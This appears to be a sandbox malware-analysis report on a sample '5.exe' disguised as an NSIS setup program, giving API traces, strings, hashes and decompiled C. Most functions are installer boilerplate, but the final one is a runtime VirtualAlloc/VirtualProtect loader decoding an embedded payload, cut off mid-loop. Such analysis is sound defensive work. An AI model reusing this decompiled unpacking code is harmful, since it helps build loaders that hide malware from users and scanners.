                                                                                              0x00403911
                                                                                              0x00403911
                                                                                              0x00403913
                                                                                              0x00403913
                                                                                              0x00000000
                                                                                              0x00403913
                                                                                              0x00403906
                                                                                              0x0040390b
                                                                                              0x00000000
                                                                                              0x0040390b
                                                                                              0x004038ea
                                                                                              0x004038f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004038f2
                                                                                              0x00000000
                                                                                              0x004038f2
                                                                                              0x004038e2
                                                                                              0x00000000
                                                                                              0x004038e2
                                                                                              0x004038c8
                                                                                              0x004038cf
                                                                                              0x004038d5
                                                                                              0x004038d7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004038d7
                                                                                              0x00403893
                                                                                              0x00000000
                                                                                              0x00403871
                                                                                              0x00403877
                                                                                              0x00403881
                                                                                              0x00403c87
                                                                                              0x00403c8d
                                                                                              0x00403c8f
                                                                                              0x00403c95
                                                                                              0x00403c9a
                                                                                              0x00403ca0
                                                                                              0x00403ca0
                                                                                              0x00403c95
                                                                                              0x00403caa
                                                                                              0x00000000
                                                                                              0x00403caa
                                                                                              0x0040386f

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                                                                              • ShowWindow.USER32(?), ref: 00403863
                                                                                              • DestroyWindow.USER32 ref: 00403877
                                                                                              • SetWindowLongA.USER32 ref: 00403893
                                                                                              • GetDlgItem.USER32 ref: 004038B4
                                                                                              • SendMessageA.USER32 ref: 004038C8
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                                                                              • GetDlgItem.USER32 ref: 0040397D
                                                                                              • GetDlgItem.USER32 ref: 00403987
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                                                                                              • SendMessageA.USER32 ref: 004039F2
                                                                                              • GetDlgItem.USER32 ref: 00403A98
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                                                                              • EnableWindow.USER32(?,?), ref: 00403ACB
                                                                                              • EnableWindow.USER32(?,?), ref: 00403AE6
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                                                                                              • EnableMenuItem.USER32 ref: 00403B03
                                                                                              • SendMessageA.USER32 ref: 00403B1B
                                                                                              • SendMessageA.USER32 ref: 00403B2E
                                                                                              • lstrlenA.KERNEL32(00429FD8,?,00429FD8,qjsvdse Setup), ref: 00403B57
                                                                                              • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                              • String ID: qjsvdse Setup
                                                                                              • API String ID: 4050669955-3915909185
                                                                                              • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                              • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                                                                              • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                              • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403489, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213stringregistrylibraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E00403489() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x42eb70; // 0x654160
				_t20 = E00405C49(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x429fd8;
					"1033" = 0x7830;
					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
					__eflags =  *0x429fd8;
					if(__eflags == 0) {
						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405889("1033",  *_t20() & 0x0000ffff);
				}
				E0040373D(_t75, _t87);
				_t24 =  *0x42eb78; // 0x80
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42ebe0 = _t24 & 0x00000020;
				if(E004054FF(_t87, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004054FF(_t95, _t84) == 0) {
						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e348 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E0040373D(_t75, __eflags);
							__eflags =  *0x42ec00; // 0x0
							if(__eflags != 0) {
								_t31 = E00404D9B(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e32c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429fb0, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e300);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e300);
								 *0x42e324 = _t85;
								RegisterClassA(0x42e300);
							}
							_t39 =  *0x42e340; // 0x0
							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42eb60; // 0x400000
						 *0x42e314 = _t28;
						_v20 = 0x624e5f;
						 *0x42e304 = E00401000;
						 *0x42e310 = _t75;
						 *0x42e324 =  &_v20;
						if(RegisterClassA(0x42e300) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x42eb98; // 0x6590c0
					_t78 = 0x42db00;
					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
					_t61 =  *0x42db00; // 0x69
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42db01;
						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E0040592B(_t84, E0040541E(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405465(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                                                              0x0040348f
                                                                                              0x00403498
                                                                                              0x0040349f
                                                                                              0x004034a1
                                                                                              0x004034b5
                                                                                              0x004034c7
                                                                                              0x004034d1
                                                                                              0x004034d6
                                                                                              0x004034dc
                                                                                              0x004034ef
                                                                                              0x004034ef
                                                                                              0x004034fa
                                                                                              0x004034a3
                                                                                              0x004034ae
                                                                                              0x004034ae
                                                                                              0x004034ff
                                                                                              0x00403504
                                                                                              0x00403509
                                                                                              0x00403512
                                                                                              0x0040351e
                                                                                              0x004035a5
                                                                                              0x004035ad
                                                                                              0x004035b6
                                                                                              0x004035b6
                                                                                              0x004035cc
                                                                                              0x004035d2
                                                                                              0x004035e0
                                                                                              0x0040366f
                                                                                              0x00403677
                                                                                              0x00403681
                                                                                              0x00403686
                                                                                              0x0040368c
                                                                                              0x0040370b
                                                                                              0x00403710
                                                                                              0x00403712
                                                                                              0x0040372e
                                                                                              0x00000000
                                                                                              0x0040372e
                                                                                              0x00403714
                                                                                              0x0040371a
                                                                                              0x00403722
                                                                                              0x00403722
                                                                                              0x00000000
                                                                                              0x0040371a
                                                                                              0x00403696
                                                                                              0x004036a7
                                                                                              0x004036a9
                                                                                              0x004036ab
                                                                                              0x004036b2
                                                                                              0x004036b2
                                                                                              0x004036ba
                                                                                              0x004036c2
                                                                                              0x004036c4
                                                                                              0x004036c6
                                                                                              0x004036cf
                                                                                              0x004036d2
                                                                                              0x004036d8
                                                                                              0x004036d8
                                                                                              0x004036de
                                                                                              0x004036f7
                                                                                              0x00403701
                                                                                              0x00000000
                                                                                              0x00403706
                                                                                              0x00403679
                                                                                              0x0040367b
                                                                                              0x00000000
                                                                                              0x004035e6
                                                                                              0x004035e6
                                                                                              0x004035ec
                                                                                              0x004035f6
                                                                                              0x004035fe
                                                                                              0x00403608
                                                                                              0x0040360e
                                                                                              0x0040361c
                                                                                              0x00403733
                                                                                              0x00403733
                                                                                              0x00000000
                                                                                              0x00403733
                                                                                              0x00403622
                                                                                              0x0040362b
                                                                                              0x0040366a
                                                                                              0x00000000
                                                                                              0x0040366a
                                                                                              0x00403524
                                                                                              0x00403524
                                                                                              0x00403529
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040352e
                                                                                              0x00403533
                                                                                              0x00403543
                                                                                              0x00403548
                                                                                              0x0040354f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403553
                                                                                              0x00403555
                                                                                              0x00403562
                                                                                              0x00403562
                                                                                              0x0040356a
                                                                                              0x00403570
                                                                                              0x00403598
                                                                                              0x004035a0
                                                                                              0x00000000
                                                                                              0x00403582
                                                                                              0x00403583
                                                                                              0x0040358c
                                                                                              0x00403592
                                                                                              0x00403593
                                                                                              0x00000000
                                                                                              0x00403593
                                                                                              0x0040358e
                                                                                              0x00403590
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403590
                                                                                              0x00403570

                                                                                              APIs
                                                                                                • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\5.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                                                                              • lstrlenA.KERNEL32(ivvzb,?,?,?,ivvzb,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\5.exe" ), ref: 00403565
                                                                                              • lstrcmpiA.KERNEL32(?,.exe,ivvzb,?,?,?,ivvzb,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                                                                              • GetFileAttributesA.KERNEL32(ivvzb), ref: 00403583
                                                                                              • LoadImageA.USER32 ref: 004035CC
                                                                                                • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                              • RegisterClassA.USER32 ref: 00403613
                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                                                                              • CreateWindowExA.USER32 ref: 00403664
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                                                                              • LoadLibraryA.KERNEL32(RichEd20), ref: 004036A7
                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                                                                              • GetClassInfoA.USER32 ref: 004036C2
                                                                                              • GetClassInfoA.USER32 ref: 004036CF
                                                                                              • RegisterClassA.USER32 ref: 004036D8
                                                                                              • DialogBoxParamA.USER32 ref: 004036F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$`Ae$ivvzb
                                                                                              • API String ID: 914957316-3978164049
                                                                                              • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                              • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                                                                              • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                              • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402C0B, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E00402C0B(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\5.exe";
				 *0x42eb6c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\5.exe", 0x400);
				_t89 = E00405602(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409010 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E0040592B("C:\\Users\\alfons\\Desktop", _t91);
				E0040592B(0x436000, E00405465(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428b88 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BB0(1);
					__eflags =  *0x42eb74 - _t82; // 0x34000
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42eb74; // 0x34000
						E00403098(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E44();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42eb70 = _t94;
							 *0x42eb78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42eb7c =  *0x42eb7c + 1;
								__eflags =  *0x42eb7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004055C3(0x42eb80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403098( *0x414b78);
					_t65 = E00403066( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42eb74; // 0x34000
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403066(0x420b88, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BB0(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42eb74;
						if( *0x42eb74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BB0(0);
							}
							goto L20;
						}
						E004055C3( &_v44, 0x420b88, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414b78; // 0xd0131
						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42eb74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409154
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428b88; // 0xd0135
						if(__eflags < 0) {
							_v12 = E00405CB5(_v12, 0x420b88, _t90);
						}
						 *0x414b78 =  *0x414b78 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                                                              0x00402c13
                                                                                              0x00402c16
                                                                                              0x00402c19
                                                                                              0x00402c1c
                                                                                              0x00402c22
                                                                                              0x00402c33
                                                                                              0x00402c38
                                                                                              0x00402c4b
                                                                                              0x00402c50
                                                                                              0x00402c53
                                                                                              0x00402c59
                                                                                              0x00000000
                                                                                              0x00402c5b
                                                                                              0x00402c66
                                                                                              0x00402c6c
                                                                                              0x00402c7d
                                                                                              0x00402c84
                                                                                              0x00402c8a
                                                                                              0x00402c8c
                                                                                              0x00402c91
                                                                                              0x00402c93
                                                                                              0x00402d80
                                                                                              0x00402d82
                                                                                              0x00402d87
                                                                                              0x00402d8e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402d90
                                                                                              0x00402d93
                                                                                              0x00402db7
                                                                                              0x00402dbc
                                                                                              0x00402dc2
                                                                                              0x00402dc4
                                                                                              0x00402dcd
                                                                                              0x00402dd2
                                                                                              0x00402dd5
                                                                                              0x00402dd6
                                                                                              0x00402dd7
                                                                                              0x00402dd9
                                                                                              0x00402dde
                                                                                              0x00402de1
                                                                                              0x00402df4
                                                                                              0x00402df8
                                                                                              0x00402e00
                                                                                              0x00402e05
                                                                                              0x00402e07
                                                                                              0x00402e07
                                                                                              0x00402e07
                                                                                              0x00402e0f
                                                                                              0x00402e0f
                                                                                              0x00402e12
                                                                                              0x00402e13
                                                                                              0x00402e13
                                                                                              0x00402e16
                                                                                              0x00402e18
                                                                                              0x00402e18
                                                                                              0x00402e18
                                                                                              0x00402e22
                                                                                              0x00402e28
                                                                                              0x00402e36
                                                                                              0x00402e3b
                                                                                              0x00000000
                                                                                              0x00402e3b
                                                                                              0x00000000
                                                                                              0x00402de1
                                                                                              0x00402d9b
                                                                                              0x00402da6
                                                                                              0x00402dab
                                                                                              0x00402dad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402db2
                                                                                              0x00402db5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402c99
                                                                                              0x00402c9e
                                                                                              0x00402c9e
                                                                                              0x00402ca3
                                                                                              0x00402ca7
                                                                                              0x00402cae
                                                                                              0x00402cb3
                                                                                              0x00402cb5
                                                                                              0x00402cb7
                                                                                              0x00402cb7
                                                                                              0x00402cbb
                                                                                              0x00402cc0
                                                                                              0x00402cc2
                                                                                              0x00402dec
                                                                                              0x00402de3
                                                                                              0x00000000
                                                                                              0x00402de3
                                                                                              0x00402cc8
                                                                                              0x00402ccf
                                                                                              0x00402d4b
                                                                                              0x00402d4f
                                                                                              0x00402d53
                                                                                              0x00402d58
                                                                                              0x00000000
                                                                                              0x00402d4f
                                                                                              0x00402cd8
                                                                                              0x00402cdd
                                                                                              0x00402ce0
                                                                                              0x00402ce5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402ce7
                                                                                              0x00402cee
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402cf0
                                                                                              0x00402cf7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402cf9
                                                                                              0x00402d00
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402d02
                                                                                              0x00402d09
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402d0b
                                                                                              0x00402d11
                                                                                              0x00402d1a
                                                                                              0x00402d20
                                                                                              0x00402d23
                                                                                              0x00402d25
                                                                                              0x00402d2b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402d31
                                                                                              0x00402d35
                                                                                              0x00402d3d
                                                                                              0x00402d3d
                                                                                              0x00402d40
                                                                                              0x00402d40
                                                                                              0x00402d43
                                                                                              0x00402d45
                                                                                              0x00402d47
                                                                                              0x00402d47
                                                                                              0x00000000
                                                                                              0x00402d45
                                                                                              0x00402d37
                                                                                              0x00402d3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402d59
                                                                                              0x00402d59
                                                                                              0x00402d5f
                                                                                              0x00402d6b
                                                                                              0x00402d6b
                                                                                              0x00402d6e
                                                                                              0x00402d74
                                                                                              0x00402d76
                                                                                              0x00402d76
                                                                                              0x00402d7e
                                                                                              0x00402d7e
                                                                                              0x00000000
                                                                                              0x00402d7e

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402C1C
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\5.exe,00000400), ref: 00402C38
                                                                                                • Part of subcall function 00405602: GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00405606
                                                                                                • Part of subcall function 00405602: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5.exe,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00402C84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`Ae$soft
                                                                                              • API String ID: 4283519449-2197865350
                                                                                              • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                              • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                                                                              • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                              • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1DF530, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190libraryloadermemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1DF530(void* __ecx) {
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _t12;
				char _t51;
				void* _t53;
				signed int _t89;
				signed int _t91;
				signed int _t123;

				_t53 = __ecx;
				_v12 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualProtect");
				_v8 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualAlloc");
				 *0x6f1f7364 = VirtualAlloc(0, 0x11e1a300, 0x3000, 4);
				if( *0x6f1f7364 != 0) {
					_t12 =  *0x6f1f7364; // 0x2a80000
					E6F1DF900(_t53, _t12, 0x11e1a300);
					 *0x6f1f7360 = 0;
					while( *0x6f1f7360 < 0x13c5) {
						_t91 =  *0x6f1f7360; // 0x13c5
						_t4 =  &E6F1F2000 + _t91; // 0x6f000000
						 *0x6f1f7fe8 =  *_t4;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x0000001b;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000002 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000006;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0x63;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000003;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0xa2;
